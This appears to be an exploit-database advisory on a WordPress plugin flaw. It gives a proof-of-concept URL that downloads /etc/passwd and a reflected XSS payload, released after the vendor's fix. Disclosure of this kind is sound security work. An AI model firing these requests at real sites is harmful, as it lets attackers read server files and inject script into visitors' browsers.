#Exploit Title: Count-per-day Wordpress plugin Arbitrary file download and XSS #Version: < 3.1.1 #Date: 2011-01-12 #Author 6Scan (http://6scan.com) security team #Software Link: http://wordpress.org/extend/plugins/count-per-day/ #Official fix: This advisory is released after the vendor has responded and fixed the issue. #Description: User could call a remote script to download arbitrary file from the target system. Another script was vulnerable to non-persistent XSS PoC for File download 192.168.0.1/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd PoC for XSS 192.168.0.1/wp-content/plugins/count-per-day/map/map.php?map='")); </script><img src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg>'
Related ExploitsMatching CVEs (2): CVE-2012-0895, CVE-2012-0896
Matching OSVDBs (2): 78270, 78271
Other Possible E-DB Search Terms: WordPress Plugin Count-per-day